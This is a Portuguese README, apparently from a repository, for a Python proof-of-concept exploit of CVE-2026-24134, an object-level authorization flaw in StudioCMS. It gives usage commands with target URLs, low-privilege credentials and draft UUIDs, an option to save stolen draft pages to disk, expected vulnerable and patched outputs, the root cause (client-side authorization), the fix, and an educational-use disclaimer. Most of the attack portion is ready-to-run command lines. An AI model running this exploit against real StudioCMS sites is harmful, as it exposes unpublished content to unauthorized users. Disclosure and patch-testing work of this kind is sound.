
Prova de conceito de exploit para CVE-2026-24134, uma vulnerabilidade de Autorização Quebrada no Nível de Objeto no StudioCMS, demonstrando acesso não autorizado a conteúdo em rascunho.
Este repositório contém a Prova de Conceito (PoC) para CVE-2026-24134, uma vulnerabilidade de Autorização Quebrada no Nível de Objeto (BOLA) no StudioCMS.
cve_2026_24134_poc.py - Script de exploração em Pythonpip install requests colorama
# Uso básico
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--username visitor_user \
--password visitor_pass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148
# Salvar saída em arquivo
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--username visitor_user \
--password visitor_pass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
--save
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--auto-test \
--visitor-user visitor01 \
--visitor-pass visitorpass \
--editor-user editor01 \
--editor-pass editorpass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148
-u, --url - URL base do StudioCMS alvo--uuid - UUID do conteúdo de rascunho alvo--username - Nome de usuário para autenticação--password - Senha para autenticação--auto-test - Ativar teste automatizado--visitor-user - Nome de usuário da conta de visitante--visitor-pass - Senha da conta de visitante--editor-user - Nome de usuário da conta de editor--editor-pass - Senha da conta de editor--save - Salvar o conteúdo da resposta em arquivo--no-ssl-verify - Desativar verificação de certificado SSLpython3 cve_2026_24134_poc.py \
--url http://target.com \
--auto-test \
--visitor-user test_visitor \
--visitor-pass SecurePass123! \
--editor-user test_editor \
--editor-pass SecurePass456! \
--uuid 12345678-1234-1234-1234-123456789abc
Saída esperada se vulnerável:
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!
Saída esperada se corrigido:
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT
python3 cve_2026_24134_poc.py \
--url http://localhost:4321 \
--username attacker \
--password pass123 \
--uuid target-uuid-here \
--save
Isso salvará o conteúdo completo do rascunho em draft_{uuid}.html.
[+] - Operação bem-sucedida (verde)[*] - Mensagem informativa (azul)[!] - Aviso (amarelo)[-] - Erro (vermelho)Se você estiver executando uma versão vulnerável do StudioCMS, atualize imediatamente para a versão corrigida.
O Problema Real: As verificações de autorização eram realizadas no lado do cliente (JavaScript), não no lado do servidor.
De acordo com a equipe de desenvolvimento:
"Atualmente, a verificação do nível de classificação para redirecionamento está sendo feita no JS do cliente, que deveria ser substituída logo em seguida."
A Correção: Mover a autorização do cliente para o servidor.
Princípio-Chave: Nunca confie no cliente. Segurança no lado do cliente = melhoria de UX. Segurança no lado do servidor = proteção real.
IMPORTANTE: Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados.
Para perguntas sobre esta PoC ou vulnerabilidade:
Esta PoC é liberada para fins educacionais. Use com responsabilidade e ética.